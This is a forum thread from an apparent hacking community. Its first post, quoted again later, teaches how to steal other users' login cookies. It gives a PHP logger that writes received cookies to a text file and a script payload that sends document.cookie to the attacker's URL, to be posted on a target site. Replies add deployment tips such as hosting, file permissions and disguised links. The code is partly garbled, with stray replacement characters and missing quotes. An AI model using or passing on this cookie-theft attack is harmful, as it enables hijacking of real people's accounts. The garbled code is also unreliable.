[HeR97]

In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�

fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�

</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment

[Toast]

I think you might have some missing characters, those question mark thingies look odd.

[farhan411]

Dear its not a full method...............you missed the important step........................

1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)


any way nice try..........

[HeR97]

Dear its not a full method...............you missed the important step........................

1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)


any way nice try..........

But everybody knows that he needs to upload it to a hosting site

[farhan411]

dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...

---

dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear

[1llusion]

dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...

---

dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear

are you trying to look pro or what? I mean, he told you to make the text file, you can even see it from the actual code itself and chmoding is pure logic... oh and it doesn't have to be 777, 777 actually makes the file unsecure, 222 is better since its just write, or 722 so the owner has all rights


At OP:
Nice guide!!!! I would just add one small thing, just a little info how to find out, if the site is vuln to XSS

[niceblue]

This is Old but still working

[hixhax]

Ahhh the script part at the end always evaded me. This is very nice for future reference.

[murder]

I think, Nothing will work if the site is not vulnerable to XSS .

[v1rtuaL.GobliN]

In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�

fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�

</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment

its working on every site?or its working only on sites which are not protected?